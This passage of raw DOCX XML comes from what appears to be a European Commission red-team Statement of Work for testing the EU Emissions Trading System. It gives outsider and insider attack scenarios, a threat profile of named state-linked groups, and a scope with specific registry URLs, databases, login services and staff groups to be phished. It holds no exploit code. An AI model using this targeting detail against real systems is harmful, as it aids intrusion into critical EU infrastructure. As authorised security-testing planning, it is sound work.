          <w:tab w:val="clear" w:pos="595"/>
          <w:tab w:val="num" w:pos="283"/>
        </w:tabs>
        <w:ind w:left="283" w:hanging="283"/>
      </w:pPr>
      <w:bookmarkStart w:id="101" w:name="_Toc184647099"/>
      <w:bookmarkStart w:id="102" w:name="_Toc212654642"/>
      <w:bookmarkStart w:id="103" w:name="_Toc213253548"/>
      <w:r w:rsidRPr="001019D3">
        <w:t>Scenario</w:t>
      </w:r>
      <w:bookmarkEnd w:id="101"/>
      <w:bookmarkEnd w:id="102"/>
      <w:bookmarkEnd w:id="103"/>
    </w:p>
    <w:p w14:paraId="42312CD8" w14:textId="77777777" w:rsidR="00E76B76" w:rsidRPr="001019D3" w:rsidRDefault="00E76B76" w:rsidP="00B312DF">
      <w:pPr>
        <w:spacing w:after="120" w:afterAutospacing="0" w:line="264" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="001019D3">
        <w:t>The scenario for this exercise will be focused on the threat groups targeting EU applications and infrastructure. The Red Team simulates real-life threat group actors with the aim to exfiltrate sensitive data to an unauthorised location.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="739241F1" w14:textId="77777777" w:rsidR="00E76B76" w:rsidRPr="001019D3" w:rsidRDefault="00E76B76" w:rsidP="00B312DF">
      <w:pPr>
        <w:spacing w:after="120" w:afterAutospacing="0" w:line="264" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="001019D3">
        <w:t>The scenario plays in two parts, or can be seen as two different attack scenarios or two threat perspectives:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CF8B4D5" w14:textId="77777777" w:rsidR="00E76B76" w:rsidRPr="001019D3" w:rsidRDefault="00E76B76" w:rsidP="00E76B76">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="28"/>
        </w:numPr>
        <w:spacing w:after="160" w:afterAutospacing="0" w:line="259" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="001019D3">
        <w:t>External or outsider perspective</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C3E3A00" w14:textId="77777777" w:rsidR="00E76B76" w:rsidRPr="001019D3" w:rsidRDefault="00E76B76" w:rsidP="00E76B76">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="28"/>
        </w:numPr>
        <w:spacing w:after="160" w:afterAutospacing="0" w:line="259" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="001019D3">
        <w:t>Internal or insider perspective</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A43FE0B" w14:textId="77777777" w:rsidR="00E76B76" w:rsidRPr="001019D3" w:rsidRDefault="00E76B76" w:rsidP="00E76B76">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:tabs>
          <w:tab w:val="clear" w:pos="737"/>
          <w:tab w:val="num" w:pos="283"/>
        </w:tabs>
        <w:ind w:left="283" w:hanging="283"/>
      </w:pPr>
      <w:bookmarkStart w:id="104" w:name="_Toc184647100"/>
      <w:bookmarkStart w:id="105" w:name="_Toc212654643"/>
      <w:bookmarkStart w:id="106" w:name="_Toc213253549"/>
      <w:r w:rsidRPr="001019D3">
        <w:t>External or outsider perspective</w:t>
      </w:r>
      <w:bookmarkEnd w:id="104"/>
      <w:bookmarkEnd w:id="105"/>
      <w:bookmarkEnd w:id="106"/>
    </w:p>
    <w:p w14:paraId="1D75E981" w14:textId="77777777" w:rsidR="00E76B76" w:rsidRPr="001019D3" w:rsidRDefault="00E76B76" w:rsidP="00B312DF">
      <w:pPr>
        <w:spacing w:after="120" w:afterAutospacing="0" w:line="264" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="001019D3">
        <w:t>The Red Team simulates attacks from the internet coming from an external malicious user (Outsider).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F8BB6EE" w14:textId="1EDEC961" w:rsidR="00E76B76" w:rsidRPr="001019D3" w:rsidRDefault="00E76B76" w:rsidP="00B312DF">
      <w:pPr>
        <w:spacing w:after="120" w:afterAutospacing="0" w:line="264" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="001019D3">
        <w:t xml:space="preserve">The Red Team members </w:t>
      </w:r>
      <w:r w:rsidR="00B86891" w:rsidRPr="001019D3">
        <w:t xml:space="preserve">may </w:t>
      </w:r>
      <w:r w:rsidRPr="001019D3">
        <w:t>no</w:t>
      </w:r>
      <w:r w:rsidR="00B86891" w:rsidRPr="001019D3">
        <w:t>t</w:t>
      </w:r>
      <w:r w:rsidRPr="001019D3">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00B86891" w:rsidRPr="001019D3">
        <w:t xml:space="preserve">have any </w:t>
      </w:r>
      <w:r w:rsidRPr="001019D3">
        <w:t xml:space="preserve">knowledge about the scope and </w:t>
      </w:r>
      <w:r w:rsidR="00B86891" w:rsidRPr="001019D3">
        <w:t xml:space="preserve">may </w:t>
      </w:r>
      <w:r w:rsidRPr="001019D3">
        <w:t xml:space="preserve">not receive or have any valid user accounts. The Red Team only knows the in-scope items are available on the internet and attempt to gain access to the application </w:t>
      </w:r>
      <w:r w:rsidR="00B86891" w:rsidRPr="001019D3">
        <w:t xml:space="preserve">or system through compromise or a phishing campaign </w:t>
      </w:r>
      <w:r w:rsidRPr="001019D3">
        <w:t xml:space="preserve">and work </w:t>
      </w:r>
      <w:r w:rsidR="00A23C16" w:rsidRPr="001019D3">
        <w:t>their way to</w:t>
      </w:r>
      <w:r w:rsidRPr="001019D3">
        <w:t>wards the backend to achieve the goals and objectives along the way.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DF5A3B9" w14:textId="77777777" w:rsidR="00E76B76" w:rsidRPr="001019D3" w:rsidRDefault="00E76B76" w:rsidP="00E76B76">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:tabs>
          <w:tab w:val="clear" w:pos="737"/>
          <w:tab w:val="num" w:pos="283"/>
        </w:tabs>
        <w:ind w:left="283" w:hanging="283"/>
      </w:pPr>
      <w:bookmarkStart w:id="107" w:name="_Toc184647101"/>
      <w:bookmarkStart w:id="108" w:name="_Toc212654644"/>
      <w:bookmarkStart w:id="109" w:name="_Toc213253550"/>
      <w:r w:rsidRPr="001019D3">
        <w:t>Internal or insider perspective</w:t>
      </w:r>
      <w:bookmarkEnd w:id="107"/>
      <w:bookmarkEnd w:id="108"/>
      <w:bookmarkEnd w:id="109"/>
    </w:p>
    <w:p w14:paraId="1396D331" w14:textId="77777777" w:rsidR="00E76B76" w:rsidRPr="001019D3" w:rsidRDefault="00E76B76" w:rsidP="00B312DF">
      <w:pPr>
        <w:spacing w:after="120" w:afterAutospacing="0" w:line="264" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="001019D3">
        <w:t xml:space="preserve">This perspective assumes that a staff member of the European Commission having a valid user account and workstation has been compromised. This simulated compromise is also known as </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="001019D3">
        <w:t>a</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="001019D3">
        <w:t xml:space="preserve"> assumed breach scenario. The perspective can also have the shape of a disgruntled malicious staff member who wants to attack the system from inside.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C30B042" w14:textId="77777777" w:rsidR="00E76B76" w:rsidRPr="001019D3" w:rsidRDefault="00E76B76" w:rsidP="00B312DF">
      <w:pPr>
        <w:spacing w:after="120" w:afterAutospacing="0" w:line="264" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="001019D3">
        <w:t>The Red Team has a physical machine and account at their disposal and attempts to attack the in-scope application from inside the network. The Red Team tries various ways to gain access to the application, any related backend system or so-called ecosystem to achieve their goals and objectives along the way.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78009688" w14:textId="77777777" w:rsidR="00E76B76" w:rsidRPr="001019D3" w:rsidRDefault="00E76B76" w:rsidP="00E76B76">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:tabs>
          <w:tab w:val="clear" w:pos="595"/>
          <w:tab w:val="num" w:pos="283"/>
        </w:tabs>
        <w:ind w:left="283" w:hanging="283"/>
      </w:pPr>
      <w:bookmarkStart w:id="110" w:name="_Toc184647104"/>
      <w:bookmarkStart w:id="111" w:name="_Toc212654645"/>
      <w:bookmarkStart w:id="112" w:name="_Toc213253551"/>
      <w:r w:rsidRPr="001019D3">
        <w:t>Threat profile</w:t>
      </w:r>
      <w:bookmarkEnd w:id="110"/>
      <w:bookmarkEnd w:id="111"/>
      <w:bookmarkEnd w:id="112"/>
    </w:p>
    <w:p w14:paraId="499BDF3C" w14:textId="77777777" w:rsidR="00E76B76" w:rsidRPr="001019D3" w:rsidRDefault="00E76B76" w:rsidP="00B312DF">
      <w:pPr>
        <w:spacing w:after="120" w:afterAutospacing="0" w:line="264" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="001019D3">
        <w:t>Threat groups targeting EUI applications and infrastructure that will be simulated are known as the following:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BCFD623" w14:textId="77777777" w:rsidR="00E76B76" w:rsidRPr="001019D3" w:rsidRDefault="00E76B76" w:rsidP="00E76B76">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="28"/>
        </w:numPr>
        <w:spacing w:after="160" w:afterAutospacing="0" w:line="259" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="001019D3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>APT29</w:t>
      </w:r>
      <w:r w:rsidRPr="001019D3">
        <w:t>: is a threat group that has been attributed to Russia's Foreign Intelligence Service (SVR). They have operated since at least 2008, often targeting government networks in Europe and NATO member countries, research institutes, and think tanks.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F56F8A5" w14:textId="77777777" w:rsidR="00E76B76" w:rsidRPr="001019D3" w:rsidRDefault="00E76B76" w:rsidP="00E76B76">
      <w:pPr>
        <w:pStyle w:val="ListNumberLevel3"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="29"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="1361"/>
        </w:tabs>
        <w:spacing w:after="120" w:afterAutospacing="0" w:line="264" w:lineRule="auto"/>
        <w:ind w:firstLine="4"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="001019D3">
        <w:t xml:space="preserve">Associated Groups: IRON RITUAL, IRON HEMLOCK, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="001019D3">
        <w:t>NobleBaron</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="001019D3">
        <w:t xml:space="preserve">, Dark Halo, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="001019D3">
        <w:t>StellarParticle</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="001019D3">
        <w:t>, NOBELIUM, UNC2452, YTTRIUM, The Dukes, Cozy Bear, CozyDuke.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="768DBC90" w14:textId="77777777" w:rsidR="00E76B76" w:rsidRPr="001019D3" w:rsidRDefault="00E76B76" w:rsidP="00E76B76">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="28"/>
        </w:numPr>
        <w:spacing w:after="160" w:afterAutospacing="0" w:line="259" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="001019D3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>BackdoorDiplomacy</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="001019D3">
        <w:t>: is a cyber espionage threat group that has been active since at least 2017. “</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="001019D3">
        <w:t>BackdoorDiplomacy</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="001019D3">
        <w:t>” has targeted Ministries of Foreign Affairs and telecommunication companies in Africa, Europe, the Middle East, and Asia.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3687CC6F" w14:textId="77777777" w:rsidR="00E76B76" w:rsidRPr="001019D3" w:rsidRDefault="00E76B76" w:rsidP="00E76B76">
      <w:pPr>
        <w:pStyle w:val="ListNumberLevel3"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="29"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="1361"/>
        </w:tabs>
        <w:spacing w:after="120" w:afterAutospacing="0" w:line="264" w:lineRule="auto"/>
        <w:ind w:firstLine="4"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="001019D3">
        <w:t>Associated Groups: None</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12BA9C5D" w14:textId="77777777" w:rsidR="00E76B76" w:rsidRPr="001019D3" w:rsidRDefault="00E76B76" w:rsidP="00E76B76">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="28"/>
        </w:numPr>
        <w:spacing w:after="160" w:afterAutospacing="0" w:line="259" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="001019D3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Magic Hound</w:t>
      </w:r>
      <w:r w:rsidRPr="001019D3">
        <w:t>: is an Iranian-sponsored threat group that conducts long term, resource-intensive cyber espionage operations, likely on behalf of the Islamic Revolutionary Guard Corps. They have targeted European, U.S., and Middle Eastern government and military personnel, academics, journalists, and organizations such as the World Health Organization (WHO), via complex social engineering campaigns since at least 2014</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C0D4DB1" w14:textId="77777777" w:rsidR="00E76B76" w:rsidRPr="001019D3" w:rsidRDefault="00E76B76" w:rsidP="00E76B76">
      <w:pPr>
        <w:pStyle w:val="ListNumberLevel3"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="29"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="1361"/>
        </w:tabs>
        <w:spacing w:after="120" w:afterAutospacing="0" w:line="264" w:lineRule="auto"/>
        <w:ind w:firstLine="4"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="001019D3">
        <w:t>Associated Groups</w:t>
      </w:r>
      <w:r w:rsidRPr="001019D3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidRPr="001019D3">
        <w:t>TA453, COBALT ILLUSION, Charming Kitten, ITG18, Phosphorus, Newscaster, APT35</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53FA38E3" w14:textId="77777777" w:rsidR="00E76B76" w:rsidRPr="001019D3" w:rsidRDefault="00E76B76" w:rsidP="00E76B76">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:tabs>
          <w:tab w:val="clear" w:pos="595"/>
          <w:tab w:val="num" w:pos="283"/>
        </w:tabs>
        <w:ind w:left="283" w:hanging="283"/>
      </w:pPr>
      <w:bookmarkStart w:id="113" w:name="_Toc184647105"/>
      <w:bookmarkStart w:id="114" w:name="_Toc212654646"/>
      <w:bookmarkStart w:id="115" w:name="_Toc213253552"/>
      <w:r w:rsidRPr="001019D3">
        <w:t>Scope</w:t>
      </w:r>
      <w:bookmarkEnd w:id="113"/>
      <w:bookmarkEnd w:id="114"/>
      <w:bookmarkEnd w:id="115"/>
    </w:p>
    <w:p w14:paraId="41654C8F" w14:textId="77777777" w:rsidR="00E76B76" w:rsidRPr="001019D3" w:rsidRDefault="00E76B76" w:rsidP="00B312DF">
      <w:pPr>
        <w:spacing w:after="120" w:afterAutospacing="0" w:line="264" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="001019D3">
        <w:t>DG CLIMA provided DIGIT.S1.SA with invaluable document in Microsoft Power Point (PPT) format. The document shows a very clear overview of the entire Emissions Trading System (ETS) application and infrastructure in a schema, which visually depicts the entire scope, environments, components to be added to the scope, components not to add to the scope as well as goals and objectives. The provided schema can be found in Annex A, attached to this Statement of Work. This schema was the main focus point when doing the scoping meeting with DG CLIMA, where the following has been decided:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6636D999" w14:textId="77777777" w:rsidR="00E76B76" w:rsidRPr="001019D3" w:rsidRDefault="00E76B76" w:rsidP="00B312DF">
      <w:pPr>
        <w:spacing w:after="120" w:afterAutospacing="0" w:line="264" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="001019D3">
        <w:t>Where possible, only the acceptance environment is to be targeted, but some components of the infrastructure only have a production environment which is also allowed to be targeted.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61469FA4" w14:textId="77777777" w:rsidR="00E76B76" w:rsidRPr="001019D3" w:rsidRDefault="00E76B76" w:rsidP="00B312DF">
      <w:pPr>
        <w:spacing w:after="120" w:afterAutospacing="0" w:line="264" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="001019D3">
        <w:t>The following high -level components are in the scope:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D674758" w14:textId="77777777" w:rsidR="00E76B76" w:rsidRPr="001019D3" w:rsidRDefault="00E76B76" w:rsidP="00E76B76">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="28"/>
        </w:numPr>
        <w:spacing w:after="0" w:afterAutospacing="0" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="714" w:hanging="357"/>
      </w:pPr>
      <w:r w:rsidRPr="001019D3">
        <w:t>EUCR (Union Registry) Web Servers and microservices in SHS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E28E2F8" w14:textId="77777777" w:rsidR="00E76B76" w:rsidRPr="001019D3" w:rsidRDefault="00E76B76" w:rsidP="00E76B76">
      <w:pPr>
        <w:pStyle w:val="ListNumberLevel3"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="29"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="1800"/>
        </w:tabs>
        <w:spacing w:after="120" w:afterAutospacing="0" w:line="264" w:lineRule="auto"/>
        <w:ind w:left="1170" w:hanging="454"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="001019D3">
        <w:t>https://acc.unionregistry.ec.europa.eu/euregistry/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7198226D" w14:textId="77777777" w:rsidR="00E76B76" w:rsidRPr="001019D3" w:rsidRDefault="00E76B76" w:rsidP="00E76B76">
      <w:pPr>
        <w:pStyle w:val="ListNumberLevel3"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="29"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="1800"/>
        </w:tabs>
        <w:spacing w:after="120" w:afterAutospacing="0" w:line="264" w:lineRule="auto"/>
        <w:ind w:left="1170" w:hanging="454"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="001019D3">
        <w:t>https://acc.unionregistry.ec.europa.eu/ar/#/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="746DA3BC" w14:textId="77777777" w:rsidR="00E76B76" w:rsidRPr="001019D3" w:rsidRDefault="00E76B76" w:rsidP="00E76B76">
      <w:pPr>
        <w:pStyle w:val="ListNumberLevel3"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="29"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="1800"/>
        </w:tabs>
        <w:spacing w:after="240" w:afterAutospacing="0" w:line="264" w:lineRule="auto"/>
        <w:ind w:left="1168" w:hanging="454"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="001019D3">
        <w:t>https://acc.unionregistry.ec.europa.eu/na/#/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D2F521E" w14:textId="77777777" w:rsidR="00E76B76" w:rsidRPr="001019D3" w:rsidRDefault="00E76B76" w:rsidP="00E76B76">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="28"/>
        </w:numPr>
        <w:spacing w:after="0" w:afterAutospacing="0" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="714" w:hanging="357"/>
      </w:pPr>
      <w:r w:rsidRPr="001019D3">
        <w:t>EUTL (Transaction Log) Public</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B6E1541" w14:textId="77777777" w:rsidR="00E76B76" w:rsidRPr="001019D3" w:rsidRDefault="00E76B76" w:rsidP="00E76B76">
      <w:pPr>
        <w:pStyle w:val="ListNumberLevel3"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="29"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="1800"/>
        </w:tabs>
        <w:spacing w:after="120" w:afterAutospacing="0" w:line="264" w:lineRule="auto"/>
        <w:ind w:left="1170" w:hanging="454"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="001019D3">
        <w:t>https://intragate.acceptance.ec.europa.eu/clima/ets/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1932159D" w14:textId="77777777" w:rsidR="00E76B76" w:rsidRPr="001019D3" w:rsidRDefault="00E76B76" w:rsidP="00E76B76">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="28"/>
        </w:numPr>
        <w:spacing w:after="160" w:afterAutospacing="0" w:line="259" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="001019D3">
        <w:t>ETS (TMS, EUCR, EUTL, …) databases or warehouses</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3173E7F3" w14:textId="77777777" w:rsidR="00E76B76" w:rsidRPr="001019D3" w:rsidRDefault="00E76B76" w:rsidP="00E76B76">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="28"/>
        </w:numPr>
        <w:spacing w:after="160" w:afterAutospacing="0" w:line="259" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="001019D3">
        <w:t>ETS ecosystem in SHS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46962CCB" w14:textId="77777777" w:rsidR="00E76B76" w:rsidRPr="001019D3" w:rsidRDefault="00E76B76" w:rsidP="00E76B76">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="28"/>
        </w:numPr>
        <w:spacing w:after="160" w:afterAutospacing="0" w:line="259" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="001019D3">
        <w:t>Union Registry Administration tool (URA) in SHS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A414795" w14:textId="77777777" w:rsidR="00E76B76" w:rsidRPr="001019D3" w:rsidRDefault="00E76B76" w:rsidP="00E76B76">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="28"/>
        </w:numPr>
        <w:spacing w:after="160" w:afterAutospacing="0" w:line="259" w:lineRule="auto"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="001019D3">
        <w:t>OneSpan</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="001019D3">
        <w:t xml:space="preserve"> and EU Login (used by </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="001019D3">
        <w:t>OneSpan</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="001019D3">
        <w:t>) in BHS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0563DED2" w14:textId="77777777" w:rsidR="00E76B76" w:rsidRPr="001019D3" w:rsidRDefault="00E76B76" w:rsidP="00E76B76">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="28"/>
        </w:numPr>
        <w:spacing w:after="160" w:afterAutospacing="0" w:line="259" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="001019D3">
        <w:t>ETS service desk users (list will be provided)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6367E0E6" w14:textId="77777777" w:rsidR="00E76B76" w:rsidRPr="001019D3" w:rsidRDefault="00E76B76" w:rsidP="00E76B76">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="28"/>
        </w:numPr>
        <w:spacing w:after="160" w:afterAutospacing="0" w:line="259" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="001019D3">
        <w:t>Service providers / Developers of ETS source code (list will be provided)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="232BC3C1" w14:textId="77777777" w:rsidR="00E76B76" w:rsidRPr="001019D3" w:rsidRDefault="00E76B76" w:rsidP="00E76B76">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="28"/>
        </w:numPr>
        <w:spacing w:after="160" w:afterAutospacing="0" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="001019D3">
        <w:t>Unisystems</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="001019D3">
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="001019D3">
        <w:t>Westpole</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="001019D3">
        <w:t xml:space="preserve"> only</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="610181AD" w14:textId="77777777" w:rsidR="00E76B76" w:rsidRPr="001019D3" w:rsidRDefault="00E76B76" w:rsidP="00E76B76">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="28"/>
        </w:numPr>
        <w:spacing w:after="160" w:afterAutospacing="0" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r w:rsidRPr="001019D3">
        <w:t>C2 implants not allowed</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11D8BD64" w14:textId="77777777" w:rsidR="00E76B76" w:rsidRPr="001019D3" w:rsidRDefault="00E76B76" w:rsidP="00E76B76">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="28"/>
        </w:numPr>
        <w:spacing w:after="160" w:afterAutospacing="0" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r w:rsidRPr="001019D3">
        <w:t>Attacking external company infrastructure not allowed</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42E65C40" w14:textId="77777777" w:rsidR="00E76B76" w:rsidRPr="001019D3" w:rsidRDefault="00E76B76" w:rsidP="00E76B76">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="28"/>
        </w:numPr>
        <w:spacing w:after="160" w:afterAutospacing="0" w:line="259" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="001019D3">
        <w:t>ETS service desk SFTP for EUCR extracts</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A6DE290" w14:textId="77777777" w:rsidR="00E76B76" w:rsidRPr="001019D3" w:rsidRDefault="00E76B76" w:rsidP="00E76B76">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="28"/>
        </w:numPr>
        <w:spacing w:after="160" w:afterAutospacing="0" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r w:rsidRPr="001019D3">
        <w:t>Only non-disruptive, known safe techniques allowed</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04996397" w14:textId="77777777" w:rsidR="00E76B76" w:rsidRPr="001019D3" w:rsidRDefault="00E76B76" w:rsidP="00E76B76">
